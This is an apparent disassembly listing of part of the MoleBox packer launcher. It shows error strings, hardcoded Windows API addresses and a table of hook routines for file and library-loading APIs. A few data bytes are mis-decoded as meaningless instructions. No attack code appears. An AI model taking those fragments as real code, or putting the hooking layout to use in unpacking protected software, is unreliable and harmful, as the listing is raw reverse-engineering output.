dword_4A1BD8 dd 584F424Dh ; DATA XREF: sub_494610:loc_4949B0�r
; sub_494610+3C4�o
align 10h
dword_4A1BE0 dd 2Ah ; DATA XREF: sub_48D06B+5A�o
dword_4A1BE4 dd 2A2E2Ah ; DATA XREF: sub_48D06B+26�o
off_4A1BE8 dd offset aAvicap32_dll ; DATA XREF: sub_495AB0:loc_495BDD�r
; sub_495AB0+139�w ...
; "avicap32.dll"
aTheUncompressi db 'The uncompression error',0
aExecutable db 'EXECUTABLE',0 ; DATA XREF: sub_495AB0+14B�o
; sub_495DC0+220�o
align 10h
aTheDynamicLink db 'The dynamic link library ',27h,'%s',27h,' could not be found',0
; DATA XREF: sub_495AB0+123�o
align 4
aOleaout32_dll db 'oleaout32.dll',0 ; DATA XREF: sub_495DC0+295�o
align 4
aOleoaut32_dll db 'oleoaut32.dll',0 ; DATA XREF: sub_495DC0:loc_496041�o
align 4
aImm32_dll db 'imm32.dll',0 ; DATA XREF: sub_495DC0:loc_49601F�o
; sub_495DC0+273�o
align 10h
loc_4A1C70: ; DATA XREF: sub_4971E1+B67�o
pop eax
push 0FF00FF00h
push 0FF00FF00h
push 0FF00FF00h
push eax
push 0FF00FF00h
retn
; ---------------------------------------------------------------------------
align 4
dword_4A1C88 dd 6C6C642Eh, 0 ; DATA XREF: sub_49681E+19�o
; sub_49681E+32�o
aDProjectsMy_sr db 'D:\Projects\My.SRC\MoleStudio\MoleBox\molebox2\bootup\mbx_DLL.cpp'
; DATA XREF: sub_4971E1+D34�o
db 0
align 4
a_box_ db '_BOX_',0 ; DATA XREF: sub_4971E1+ADB�o
align 4
aGetcurrentdire db 'GetCurrentDirectoryA',0 ; DATA XREF: sub_498494+EE�o
align 4
aSetcurrentdire db 'SetCurrentDirectoryA',0 ; DATA XREF: sub_498494+C0�o
align 4
aMbx@X@_ db 'MBX@%X@*.###',0 ; DATA XREF: sub_498494+53�o
; sub_499892+E8�o
align 4
aStripped db '<stripped>',0 ; DATA XREF: _5:off_49F4FC�o
align 4
aAssertionFai_0 db 'ASSERTION failed',0 ; DATA XREF: _5:off_49F4F8�o
align 4
aMoleboxLaunche db 'MoleBox launcher fatal error',0 ; DATA XREF: _5:off_49F4F4�o
align 4
asc_4A1D5C: ; DATA XREF: sub_49948C+57�o
; sub_4994F7+2D�o
dw 0Ah
unicode 0, <>,0
aErrorAtSDReaso db 'Error at %s:%d',0Ah ; DATA XREF: sub_49948C+1E�o
db 0Ah
db 'Reason: ',0
align 4
aUp1_txt db '-up1.txt',0 ; DATA XREF: sub_499538:loc_499648�o
align 4
aUp_txt db '-up.txt',0 ; DATA XREF: sub_499538+BC�o
asc_4A1D90 db 0Dh,0Ah,0 ; DATA XREF: sub_499726+59�o
align 4
aWindowsErrorSA db 'windows error %s',0Ah ; DATA XREF: sub_4997CA+75�o
db ' at %s(%d)',0Ah,0
align 4
aMbx@X@X_ db 'MBX@%X@%X.###',0 ; DATA XREF: sub_499892+C2�o
align 4
aMbx@X@X@X_ db 'MBX@%X@%X@%X.###',0 ; DATA XREF: sub_499892+93�o
align 4
a__0 db '.###',0 ; DATA XREF: sub_499A16+175�o
align 10h
aMbx@ db 'MBX@',0 ; DATA XREF: sub_499A16+78�o
align 4
aInvalidDllRelo db 'INVALID DLL RELOCATION',0 ; DATA XREF: sub_499C27:loc_499E60�o
align 10h
aBadFuulname db 'BAD FUULNAME',0 ; DATA XREF: sub_499C27:loc_499E57�o
align 10h
aGetmodulenameE db 'GetModuleName ERROR',0 ; DATA XREF: sub_499C27:loc_499E4E�o
aHookingDllErro db 'HOOKING DLL ERROR',0 ; DATA XREF: sub_499C27:loc_499E45�o
align 4
aPackedDllOrBox db 'PACKED DLL OR BOXFILE CORRUPTED',0 ; DATA XREF: sub_499C27:loc_499E3C�o
aInvalidCompres db 'INVALID COMPRESSION/ENCRYPTION ALGORITHM',0
; DATA XREF: sub_499C27:loc_499E33�o
align 4
aDllCorrupted db 'DLL CORRUPTED',0 ; DATA XREF: sub_499C27:loc_499E2A�o
align 4
aHeapCorrupted db 'HEAP CORRUPTED',0 ; DATA XREF: sub_499C27:loc_499E21�o
align 4
aCouldNotCreate db 'COULD NOT CREATE HEAP',0 ; DATA XREF: sub_499C27:loc_499E18�o
align 4
aVirtualprote_0 db 'VIRTUALPROTECT BROKEN',0 ; DATA XREF: sub_499C27:loc_499E0F�o
align 4
aWrappersTableB db 'WRAPPERS TABLE BROKEN',0 ; DATA XREF: sub_499C27:loc_499E06�o
align 4
aOutOfMemory db 'OUT OF MEMORY',0 ; DATA XREF: sub_499C27:loc_499DFD�o
align 4
aFeatureIsNotIm db 'FEATURE IS NOT IMPLEMENTED',0 ; DATA XREF: sub_499C27:loc_499DF4�o
align 4
aBoxfileCorrupt db 'BOXFILE CORRUPTED',0 ; DATA XREF: sub_499C27:loc_499DEB�o
align 4
aReadBoxfileErr db 'READ BOXFILE ERROR',0 ; DATA XREF: sub_499C27:loc_499DE2�o
align 10h
aCouldNotOpenBo db 'COULD NOT OPEN BOXFILE',0 ; DATA XREF: sub_499C27:loc_499DD6�o
align 4
aPathIsVeryLong db 'PATH IS VERY LONG',0 ; DATA XREF: sub_499C27:loc_499DCA�o
align 4
aExecutableCorr db 'EXECUTABLE CORRUPTED',0 ; DATA XREF: sub_499C27:loc_499DBE�o
align 4
aDynamicLibrary db 'DYNAMIC LIBRARY IS NOT NT IMAGE',0 ; DATA XREF: sub_499C27:loc_499DB2�o
aExecutableIsNo db 'EXECUTABLE IS NOT NT IMAGE',0 ; DATA XREF: sub_499C27:loc_499DA6�o
align 10h
aHasNoAccessToE db 'HAS NO ACCESS TO EXECUTABLE',0 ; DATA XREF: sub_499C27:loc_499D9A�o
aAssertionFaile db 'ASSERTION FAILED',0 ; DATA XREF: sub_499C27:loc_499D8E�o
align 10h
aEsi0x08xEdi0x0 db 'ESI:0x%08X EDI:0x%08X',0 ; DATA XREF: sub_499C27+101�o
align 4
aEsp0x08xEbp0x0 db 'ESP:0x%08X EBP:0x%08X EIP:0x%08X',0 ; DATA XREF: sub_499C27+DC�o
align 4
aEax0x08xEdx0x0 db 'EAX:0x%08X EDX:0x%08X ECX:0x%08X',0 ; DATA XREF: sub_499C27+AB�o
align 10h
aEs0x08xFs0x08x db 'ES :0x%08X FS :0x%08X GS :0x%08X',0 ; DATA XREF: sub_499C27+7A�o
align 4
aCs0x08xSs0x08x db 'CS :0x%08X SS :0x%08X DS :0x%08X',0 ; DATA XREF: sub_499C27+49�o
align 4
a__seh__0xXAt0x db '__SEH__ 0x%x at 0x%x',0 ; DATA XREF: sub_499C27+18�o
align 10h
aCc7574e45e3947 db '{CC7574E4-5E39-4700-B286-269A82DD8E95}',0 ; DATA XREF: sub_48D271+40�o
; sub_48D271+E2�o
align 4
a_splashscreen_ db '_splashscreen.bmp',0 ; DATA XREF: sub_48D3F3+12�o
align 4
aBroken0x08x db '!broken!0x%08x:',0 ; DATA XREF: sub_499EF3+FB�o
a0x08xS03x08x db '0x%08x:[%s]:(%03x:%08x)',0 ; DATA XREF: sub_499EF3+CA�o
aUnknown db 'unknown',0 ; DATA XREF: sub_499EF3+B7�o
a0x08xUnknownUn db '0x%08x:[unknown]:unknown',0 ; DATA XREF: sub_499EF3+60�o
align 4
aBroken db '!broken!',0 ; DATA XREF: sub_499EF3+31�o
align 4
a0x08x0x08x0x08 db '0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x',0 ; DATA XREF: sub_49A18E+F9�o
aStack db '--stack--',0 ; DATA XREF: sub_49A18E:loc_49A242�o
align 4
a___OpssBrokenB db ' ... opss, broken by SEH',0 ; DATA XREF: sub_49A18E+A5�o
; sub_49A18E+11E�o
align 10h
aS_7 db ' %s',0 ; DATA XREF: sub_49A18E+47�o
; sub_49A18E+8A�o
align 4
aBacktrace db '-- backtrace --',0 ; DATA XREF: sub_49A18E+28�o
dd 2 dup(0FFFFFFFFh)
aDllgetclassobj db 'DllGetClassObject',0 ; DATA XREF: sub_49A31F+51�o
; sub_49C076+39�o
align 8
dword_4A21C8 dd 2 dup(0) ; DATA XREF: sub_49A3B3+55�o
dd 0C0h, 46000000h
dword_4A21D8 dd 1, 0 ; DATA XREF: sub_49A3B3+11�o
dd 0C0h, 46000000h
aRegqueryvaluea db 'RegQueryValueA',0 ; DATA XREF: sub_49A638+42�o
align 4
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0 ; DATA XREF: sub_49A638+3D�o
align 4
aClsid08x04x04x db 'CLSID\{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}\InprocSe'
; DATA XREF: sub_49A71C+58�o
db 'rver32',0
off_4A2250 dd offset sub_49AC54 ; DATA XREF: sub_49ADD4+102�o
dd offset aSetunhandled_1 ; "SetUnhandledExceptionFilter"
; ---------------------------------------------------------------------------
mov al, 0C2h
dec ecx
add [esi+esi*8], ah
dec ecx
add dh, bh
retn 49h
; ---------------------------------------------------------------------------
xor dh, dh
dec ecx
add [edi+2C0049B7h], ch
test dword ptr [ecx+0], offset sub_49B7DD
inc eax
test dword ptr [ecx+0], offset sub_49B8AA
push esp
test dword ptr [ecx+0], offset sub_49C3FC
cmp al, 0F6h
dec ecx
add ch, dl
retn
; ---------------------------------------------------------------------------
dw 49h
dd offset aClosehandle_1 ; "CloseHandle"
dd offset sub_49C460
dd offset aSetfilepoint_1 ; "SetFilePointer"
dd offset sub_49B9EC
dd offset aGetfilesize_1 ; "GetFileSize"
dd offset sub_49B0C8
dd offset aExitprocess_1 ; "ExitProcess"
dd offset sub_49C4A4
dd offset aCreatefilema_2 ; "CreateFileMappingA"
dd offset sub_49C4E0
dd offset aCreatefilema_3 ; "CreateFileMappingW"
dd offset sub_49C51C
dd offset aMapviewoffil_0 ; "MapViewOfFile"
dd offset sub_49C55B
dd offset aUnmapviewoff_0 ; "UnmapViewOfFile"
dd offset sub_49C18D
dd offset aFreelibrary_0 ; "FreeLibrary"
dd offset sub_49BE83
dd offset aLoadlibrarya_0 ; "LoadLibraryA"
dd offset sub_49BF65
dd offset aLoadlibraryw ; "LoadLibraryW"
dd offset sub_49BE96
dd offset aLoadlibrarye_0 ; "LoadLibraryExA"
dd offset sub_49BF78
dd offset aLoadlibraryexw ; "LoadLibraryExW"
dd offset sub_49C076
dd offset aGetprocaddre_0 ; "GetProcAddress"
dd offset sub_49B334
dd offset aFindfirstfil_1 ; "FindFirstFileA"
dd offset sub_49B361
dd offset aFindfirstfilew ; "FindFirstFileW"
dd offset sub_49B4AA
dd offset aFindfirstfilee ; "FindFirstFileExW"
dd offset sub_49B5FF
dd offset aFindclose_1 ; "FindClose"
dd offset sub_49B626
dd offset aFindnextfile_1 ; "FindNextFileA"
dd offset sub_49B657
dd offset aFindnextfilew ; "FindNextFileW"
dd offset sub_49C582
dd offset aOpenfile ; "OpenFile"
dd offset sub_49C636
dd offset a_lopen ; "_lopen"
dd offset sub_49C677
dd offset a_lclose ; "_lclose"
dd offset sub_49C711
dd offset a_lread ; "_lread"
dd offset sub_49C6CC
dd offset a_llseek ; "_llseek"
dd offset sub_49BF8C
dd offset aGetmodulehan_0 ; "GetModuleHandleA"
dd offset sub_49BFC6
dd offset aGetmodulehan_1 ; "GetModuleHandleW"
dd offset sub_49B226
dd offset aSearchpathw ; "SearchPathW"
dd offset sub_49B1C7
dd offset aSearchpatha_0 ; "SearchPathA"
dd offset sub_49BC66
dd offset aGetprivatepr_2 ; "GetPrivateProfileStringA"
dd offset sub_49BD0C
dd offset aGetprivatepr_3 ; "GetPrivateProfileIntA"
dd offset sub_49BD93
dd offset aGetprivatepr_4 ; "GetPrivateProfileSectionNamesA"
dd offset sub_49BDDE
dd offset aGetprivatepr_5 ; "GetPrivateProfileSectionA"
dd offset sub_49B710
dd offset aGetfileinfor_0 ; "GetFileInformationByHandle"
dd offset sub_49B741
dd offset aLockfile_0 ; "LockFile"
dd offset sub_49B77D
dd offset aUnlockfile_0 ; "UnlockFile"
dd offset sub_49BA24
dd offset aGetmodulefil_0 ; "GetModuleFileNameA"
dd offset sub_49BA5E
dd offset aGetmodulefil_1 ; "GetModuleFileNameW"
dd offset sub_49BAEB
dd offset aGetlongpathn_1 ; "GetLongPathNameA"
dd offset sub_49BB3D
dd offset aGetlongpathn_2 ; "GetLongPathNameW"
off_4A23C8 dd offset sub_49C23E ; DATA XREF: sub_49ADD4+116�o
dd offset aAddfontresou_0 ; "AddFontResourceA"
dd offset sub_49C277
dd offset aRemovefontre_0 ; "RemoveFontResourceA"
off_4A23D8 dd offset sub_49C1EA ; DATA XREF: sub_49ADD4+12A�o
dd offset aLoadimagea_0 ; "LoadImageA"
off_4A23E0 dd offset sub_49A518 ; DATA XREF: sub_49ADD4+13E�o
dd offset aCocreateinstan ; "CoCreateInstance"
dd offset sub_49A789
dd offset aCocreateinst_0 ; "CoCreateInstanceEx"
dd offset sub_49A8C0
dd offset aCogetclassobje ; "CoGetClassObject"
off_4A23F8 dd offset sub_49AA34 ; DATA XREF: sub_49ADD4+152�o
dd offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
dd offset sub_49AB3C
dd offset aLoadregtypelib ; "LoadRegTypeLib"
aGetfileattri_1 db 'GetFileAttributesExW',0 ; DATA XREF: sub_49B8AA+F0�o
align 10h
aGetlongpathn_0 db 'GetLongPathNameW',0 ; DATA XREF: sub_49BB3D+A8�o
align 4
dword_4A2434 dd 19930520h, 491829h, 158h, 12E718h, 3 dup(0) ; DATA XREF: _4:0048D523�o
; sub_48D52A+2�o
off_4A2450 dd offset word_4A245A ; DATA XREF: sub_48D86E:loc_48D8BD�r
; sub_48D86E:loc_48D8CF�r ...
dd offset word_4A245A
db 2 dup(0)
word_4A245A dw 20h ; DATA XREF: _6:off_4A2450�o
; _6:004A2454�o
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_4A265C dd 1 ; DATA XREF: sub_48D86E+3C�r
; sub_48D9EA:loc_48D9F2�r ...
dd 2Eh, 1, 2 dup(0)
dword_4A2670 dd 77E64C09h ; DATA XREF: sub_48E2E0+1DF�w
; sub_48E2E0+1F6�r ...
dword_4A2674 dd 8E0000h ; DATA XREF: _4:0048EED3�w _4:0048EF0F�r
dword_4A2678 dd 900000h ; DATA XREF: _4:0048EF0A�w _4:0048EF1B�r
dword_4A267C dd 8F0000h ; DATA XREF: _4:0048EEF4�w
dword_4A2680 dd 2 ; DATA XREF: _4:0048F0BC�r
; sub_495DC0+59�r ...
dword_4A2684 dd 8D1F18h ; DATA XREF: _4:0048F206�r
; _4:loc_48F28F�r ...
dword_4A2688 dd 48EB3Eh ; DATA XREF: sub_48EE50+3�r
; _4:0048EE6F�w
dword_4A268C dd 0FFFFFFFFh ; DATA XREF: sub_48E2E0+213�w
; sub_48E2E0+387�r ...
dd 0
byte_4A2694 db 0 ; DATA XREF: _4:0048F2A1�w
; sub_49681E+E�r
align 4
dword_4A2698 dd 7 ; DATA XREF: sub_48E2E0+407�w
; sub_495DC0:loc_495E0D�r
off_4A269C dd offset a_text ; DATA XREF: sub_48E2E0+410�w
; _4:loc_48FC97�r ...
; ".text"
dword_4A26A0 dd 0 ; DATA XREF: sub_48F2E0+8B3�o
dword_4A26A4 dd 77E77963h ; DATA XREF: sub_48F2E0+3A�w
; sub_48F2E0+881�o ...
dword_4A26A8 dd 77E7A837h ; DATA XREF: sub_48F2E0+4E�w
; _4:0048FC0C�r ...
dword_4A26AC dd 77E779B1h ; DATA XREF: sub_48F2E0+62�w
; _4:0049C39D�r
dword_4A26B0 dd 77E77797h ; DATA XREF: sub_48F2E0+76�w
; _4:0048FC40�r ...
dword_4A26B4 dd 77E776D3h ; DATA XREF: sub_48F2E0+8A�w
; sub_49C4E0+2C�r
dword_4A26B8 dd 77E61BB8h ; DATA XREF: sub_48F2E0+9E�w
; sub_4981C3+E6�r
dword_4A26BC dd 77EB36A5h ; DATA XREF: sub_48F2E0+B2�w
dword_4A26C0 dd 77E73628h ; DATA XREF: sub_48F2E0+C6�w
; sub_49094C+2EA�r ...
dword_4A26C4 dd 77F7E21Fh ; DATA XREF: sub_48F2E0+DA�w
; sub_490252+2A�r ...
dword_4A26C8 dd 77E75CB5h ; DATA XREF: sub_48F2E0+EE�w
; sub_49B0C8+AF�r
dword_4A26CC dd 77E78EAAh ; DATA XREF: sub_48F2E0+102�w
; sub_493DD0+5E2�r ...
dword_4A26D0 dd 77E75D9Eh ; DATA XREF: sub_48F2E0+116�w
; sub_4906DE+B4�r ...
dword_4A26D4 dd 77E75E67h ; DATA XREF: sub_48F2E0+12A�w
; sub_4906DE+DC�r ...
dword_4A26D8 dd 77E73FF9h ; DATA XREF: sub_48F2E0+13E�w
; sub_4971E1+CFE�r
dword_4A26DC dd 77E76A60h ; DATA XREF: sub_48F2E0+152�w
; sub_4997CA+60�r
dword_4A26E0 dd 77E80618h ; DATA XREF: sub_48F2E0+166�w
; sub_4968CF+163�r ...
dword_4A26E4 dd 77E79C90h ; DATA XREF: sub_48F2E0+17A�w
; sub_4981C3+4B�r ...
dword_4A26E8 dd 77E80656h ; DATA XREF: sub_48D216+15�r
; sub_48F2E0+18E�w ...
dword_4A26EC dd 77E7AC5Eh ; DATA XREF: sub_48F2E0+1A2�w
dword_4A26F0 dd 77E7FF65h ; DATA XREF: sub_48F2E0+1B6�w
dword_4A26F4 dd 77E74CABh ; DATA XREF: sub_48F2E0+1CA�w
; sub_49B7AF+16�r
dword_4A26F8 dd 77E78536h ; DATA XREF: sub_48F2E0+1DE�w
; sub_49B7DD+84�r
dword_4A26FC dd 77E72EA0h ; DATA XREF: sub_48F2E0+1F2�w
; sub_491858+83�r ...
dword_4A2700 dd 77E793EFh ; DATA XREF: sub_48F2E0+206�w
; _4:0048FC21�r ...
dword_4A2704 dd 77E73CE2h ; DATA XREF: sub_48F2E0+21A�w
; sub_494610+720�r
dword_4A2708 dd 77E80357h ; DATA XREF: sub_48F2E0+22E�w
; sub_490252+71�r ...
dword_4A270C dd 77E781DBh ; DATA XREF: sub_48F2E0+242�w
; sub_49B226+92�r
dword_4A2710 dd 77F5157Dh ; DATA XREF: sub_48F2E0+256�w
; sub_4968CF+14E�r ...
dword_4A2714 dd 77E7A099h ; DATA XREF: sub_48F2E0+26A�w
; _4:0048FE99�r ...
dword_4A2718 dd 77E79F93h ; DATA XREF: sub_48D271+4C�r
; _4:0048EE79�r ...
dword_4A271C dd 77E719F3h ; DATA XREF: sub_48F2E0+292�w
; sub_49BD0C+76�r
dword_4A2720 dd 77E61FD2h ; DATA XREF: sub_48F2E0+2A6�w
; sub_49BD93+3B�r
dword_4A2724 dd 77E72C64h ; DATA XREF: sub_48F2E0+2BA�w
; sub_49BC66+95�r
dword_4A2728 dd 77E7A5FDh ; DATA XREF: _4:0048EEA2�r
; sub_48F2E0+2CE�w ...
dword_4A272C dd 77E6167Bh ; DATA XREF: sub_48F2E0+2E2�w
; sub_491C5C+97�r ...
dword_4A2730 dd 77E6AF8Fh ; DATA XREF: sub_48F2E0+2F6�w
; sub_49094C+1A6�r
dword_4A2734 dd 77E6AD34h ; DATA XREF: sub_48F2E0+30A�w
; sub_49094C+193�r ...
dword_4A2738 dd 77E7C657h ; DATA XREF: sub_48F2E0+31E�w
dword_4A273C dd 77E7751Ah ; DATA XREF: _4:0048EEDF�r
; sub_48F2E0+332�w
dword_4A2740 dd 77F516F8h ; DATA XREF: sub_48F2E0+346�w
; sub_49935A+1F�r
dword_4A2744 dd 77F51597h ; DATA XREF: sub_48F2E0+35A�w
; sub_4993DD+1C�r
dword_4A2748 dd 77E7C726h ; DATA XREF: sub_48F2E0+36E�w
; sub_499397+16�r
dword_4A274C dd 77E79908h ; DATA XREF: sub_48F2E0+382�w
; sub_493DD0+2E�r ...
dword_4A2750 dd 77F53275h ; DATA XREF: sub_48F2E0+396�w
; sub_49C82A+2B�r
dword_4A2754 dd 77F7E300h ; DATA XREF: sub_48F2E0+3AA�w
; sub_49061F+5�r ...
dword_4A2758 dd 77E805B8h ; DATA XREF: sub_48F2E0+3D2�w
; sub_4971E1+17F�r
dword_4A275C dd 77E805D8h ; DATA XREF: sub_48F2E0+3BE�w
; sub_48F2E0+5D0�r ...
dword_4A2760 dd 77E79881h ; DATA XREF: sub_48F2E0+3E6�w
dword_4A2764 dd 77E79A45h ; DATA XREF: sub_48F2E0+3FA�w
; sub_499864+9�r
dword_4A2768 dd 77E64E2Bh ; DATA XREF: sub_48F2E0+40E�w
; sub_49B741+23�r
dword_4A276C dd 77E74D76h ; DATA XREF: sub_48F2E0+422�w
; _4:0048FC5D�r ...
dword_4A2770 dd 77E77CCEh ; DATA XREF: sub_48F2E0+436�w
; sub_49AA34+69�r ...
dword_4A2774 dd 77E706B7h ; DATA XREF: sub_48F2E0+44A�w
dword_4A2778 dd 77E6D706h ; DATA XREF: _4:0048EE93�r _4:0048EEBC�r ...
dword_4A277C dd 77E78B82h ; DATA XREF: sub_48F2E0+472�w
; _4:00491B0B�r ...
dword_4A2780 dd 77E6BD68h ; DATA XREF: sub_48F2E0+486�w
dword_4A2784 dd 77E74A3Bh ; DATA XREF: sub_48F2E0+49A�w
; sub_49C3FC+57�r
dword_4A2788 dd 77E78C81h ; DATA XREF: sub_48F2E0+4AE�w
; sub_491346+74�r ...
dword_4A278C dd 77F51587h ; DATA XREF: sub_48F2E0+4C2�w
; sub_490252+3BC�r ...
dword_4A2790 dd 77E7C9E7h ; DATA XREF: sub_48F2E0+4D6�w
; sub_499C17+8�r ...
dword_4A2794 dd 77E61BE6h ; DATA XREF: sub_48D271+137�r
; sub_48D271+16A�r ...
dword_4A2798 dd 77E616B4h ; DATA XREF: sub_48F2E0+4FE�w
; sub_499401+2D�r ...
dword_4A279C dd 77E64EA0h ; DATA XREF: sub_48F2E0+512�w
; sub_49B77D+23�r
dword_4A27A0 dd 77E75090h ; DATA XREF: sub_48F2E0+526�w
; sub_48FDE4:loc_48FDEE�r ...
dword_4A27A4 dd 77E7980Ah ; DATA XREF: sub_48F2E0+53A�w
; sub_490FBF+125�r ...
dword_4A27A8 dd 77E79E34h ; DATA XREF: sub_48F2E0+54E�w
; sub_490ECD+91�r ...
dword_4A27AC dd 77E6169Ah ; DATA XREF: sub_48F2E0+562�w
; sub_490FBF+14B�r ...
dword_4A27B0 dd 77E7F044h ; DATA XREF: sub_48F2E0+576�w
; sub_499EF3+56�r
dword_4A27B4 dd 77E79D5Bh ; DATA XREF: sub_48F2E0+58A�w
dword_4A27B8 dd 77E79924h ; DATA XREF: sub_48F2E0+59E�w
; sub_49B226+6A�r ...
dword_4A27BC dd 77E79D8Ch ; DATA XREF: sub_48F2E0+5B2�w
; sub_49094C+282�r ...
dword_4A27C0 dd 77E76A2Eh ; DATA XREF: sub_48F2E0+5C6�w
; sub_492CC4+1E2�r ...
dword_4A27C4 dd 77D98E9Ah ; DATA XREF: sub_48F2E0+5FF�w
; sub_499401+B�r ...
dword_4A27C8 dd 77D44D9Bh ; DATA XREF: sub_48F2E0+613�w
; sub_490252+88�r ...
dword_4A27CC dd 77D4D42Bh ; DATA XREF: sub_48F2E0+627�w
; sub_49C1EA+44�r
dword_4A27D0 dd 77D6ADD7h ; DATA XREF: sub_48F2E0+63B�w
; sub_499401+1E�r ...
dword_4A27D4 dd 77D4C96Ah ; DATA XREF: sub_48F2E0+64F�w
; sub_498494+5D�r ...
dword_4A27D8 dd 77D4C783h ; DATA XREF: sub_48F2E0+663�w
; sub_49948C+45�r ...
dword_4A27DC dd 77C87425h ; DATA XREF: sub_48F2E0+69C�w
; sub_49094C+2D4�r
dword_4A27E0 dd 77C7212Fh ; DATA XREF: sub_48D15E+41�r
; sub_48F2E0+6B0�w ...
dword_4A27E4 dd 77C76551h ; DATA XREF: sub_48F2E0+6C4�w
; sub_496456+1D1�r
dword_4A27E8 dd 77C72C6Bh ; DATA XREF: sub_48D15E+8A�r
; sub_48F2E0+6D8�w ...
dword_4A27EC dd 77C87887h ; DATA XREF: sub_48F2E0+6EC�w
; sub_490D24+E6�r ...
dword_4A27F0 dd 77D458EEh ; DATA XREF: sub_48D15E+38�r
; sub_48F2E0+700�w
dword_4A27F4 dd 77D458FDh ; DATA XREF: sub_48D15E+97�r
; sub_48F2E0+714�w
dword_4A27F8 dd 77C7506Dh ; DATA XREF: sub_48D15E+2B�r
; sub_48D271+26�r ...
dword_4A27FC dd 77C71BB0h ; DATA XREF: sub_48D15E+53�r
; sub_48D15E+81�r ...
dword_4A2800 dd 77C72889h ; DATA XREF: sub_48D271+175�r
; sub_48F2E0+750�w
dword_4A2804 dd 77C729E2h ; DATA XREF: sub_48D15E+75�r
; sub_48F2E0+764�w
dword_4A2808 dd 77D45CBCh ; DATA XREF: sub_48D216+F�r
; sub_48F2E0+778�w
dword_4A280C dd 77D48977h ; DATA XREF: sub_48D216+41�r
; sub_48F2E0+78C�w
dword_4A2810 dd 77D47F34h ; DATA XREF: sub_48D216+4A�r
; sub_48F2E0+7A0�w
dword_4A2814 dd 77D4DCCCh ; DATA XREF: sub_48D271+5C�r
; sub_48F2E0+7B4�w
dword_4A2818 dd 77D477C0h ; DATA XREF: sub_48D271+64�r
; sub_48D271+6F�r ...
dword_4A281C dd 77D414D4h ; DATA XREF: sub_48D271+E9�r
; sub_48F2E0+7DC�w
dword_4A2820 dd 77D44200h ; DATA XREF: sub_48D271+105�r
; sub_48F2E0+7F0�w
dword_4A2824 dd 77D43DD3h ; DATA XREF: sub_48D271+123�r
; sub_48F2E0+804�w
dword_4A2828 dd 77D441F2h ; DATA XREF: sub_48D271+12D�r
; sub_48F2E0+818�w
dword_4A282C dd 77D49A11h ; DATA XREF: sub_48D216+31�r
; sub_48F2E0+82C�w
dword_4A2830 dd 77D47627h ; DATA XREF: sub_48D271+157�r
; sub_48F2E0+840�w
dword_4A2834 dd 77D46F5Bh ; DATA XREF: sub_48F2E0+854�w
dword_4A2838 dd 77D442CFh ; DATA XREF: _4:0048F2C7�r
; sub_48F2E0+868�w
dword_4A283C dd 77E7AC37h ; DATA XREF: sub_48D3F3+45�r
; sub_48F2E0+87C�w
dword_4A2840 dd 0 ; DATA XREF: sub_48F2E0+888�o
byte_4A2844 db 0 ; DATA XREF: sub_490166+69�o
; sub_490166+7F�w ...
align 4
dd 20h dup(0)
dword_4A28C8 dd 77FC5940h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_490252+25�o
; sub_49061F�o ...
dword_4A28E0 dd 950538h ; DATA XREF: sub_490ECD+25�r
; sub_490ECD+5D�r ...
dword_4A28E4 dd 9500A8h ; DATA XREF: sub_490036+50�r
; sub_490036+8E�r ...
dword_4A28E8 dd 9502F0h ; DATA XREF: sub_49094C:loc_490A1E�r
; sub_49094C+10B�r ...
dword_4A28EC dd 950780h ; DATA XREF: sub_49063E+7E�r
; sub_4906DE+25�r ...
dword_4A28F0 dd 0 ; DATA XREF: sub_493D50+8�r
; sub_493D50+19�r
dword_4A28F4 dd 0 ; DATA XREF: sub_493D50+10�r
dword_4A28F8 dd 910048h ; DATA XREF: _4:00491A28�r _4:00491AFF�r ...
dword_4A28FC dd 920090h ; DATA XREF: sub_493DD0+660�w
; _6:off_4A1B80�o
dword_4A2900 dd 930098h ; DATA XREF: sub_493DD0+67E�w
; _6:004A1B98�o
dword_4A2904 dd 9400A0h ; DATA XREF: sub_493DD0+69D�w
; _6:004A1BB0�o
dword_4A2908 dd 8D2518h ; DATA XREF: sub_490252+34�r
; sub_490252+5E�r ...
dword_4A290C dd 8D3140h ; DATA XREF: sub_493DD0+227�w
; sub_493DD0+235�r ...
dword_4A2910 dd 4000F0h ; DATA XREF: sub_494610+D8�w
; sub_494610+DE�r ...
dword_4A2914 dd 0 ; DATA XREF: sub_495D70+4�r
; sub_495D70+C�w ...
dword_4A2918 dd 2 dup(0) ; DATA XREF: sub_48D271+DD�o
; sub_49BD0C+37�o
dword_4A2920 dd 0 ; DATA XREF: sub_498333+11�r
; sub_498494+22�w ...
align 8
dword_4A2928 dd 0 ; DATA XREF: sub_496BD7+3AB�w
; sub_496BD7+3DB�w ...
align 10h
dword_4A2930 dd 77FC5880h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_48E2E0+3B3�o
; sub_4971E1+73�o ...
dword_4A2948 dd 0 ; DATA XREF: sub_498333+24�w
; sub_498333+29�r ...
dword_4A294C dd 8D23B8h ; DATA XREF: sub_496BD7+22A�r
; sub_496FCD+12�r ...
dword_4A2950 dd 8D2478h ; DATA XREF: sub_49ADD4+F6�w
dword_4A2954 dd 8D2418h ; DATA XREF: sub_4968CF+1A�r
; sub_496BD7:loc_496D97�r ...
dword_4A2958 dd 0 ; DATA XREF: sub_4971E1+D0D�w
; sub_4981C3+5F�r
dword_4A295C dd 0 ; DATA XREF: sub_4968A0+3�r
; sub_4968A0+1D�w ...
dword_4A2960 dd 0 ; DATA XREF: sub_496BD7+3B5�r
; sub_496BD7+3C6�w ...
dword_4A2964 dd 0 ; DATA XREF: sub_4971E1+82�r
; sub_4971E1+E3�r ...
dword_4A2968 dd 0 ; DATA XREF: sub_4971E1+105�r
; sub_4971E1+10B�w ...
dword_4A296C dd 0 ; DATA XREF: sub_49713C+5�r
; sub_49714D+A�r ...
dword_4A2970 dd 0 ; DATA XREF: sub_498333+9B�r
; sub_498494+9E�w ...
dword_4A2974 dd 0 ; DATA XREF: sub_498333+A8�r
; sub_498494+CC�w ...
dword_4A2978 dd 0 ; DATA XREF: sub_498333+BA�r
; sub_498494+FA�w ...
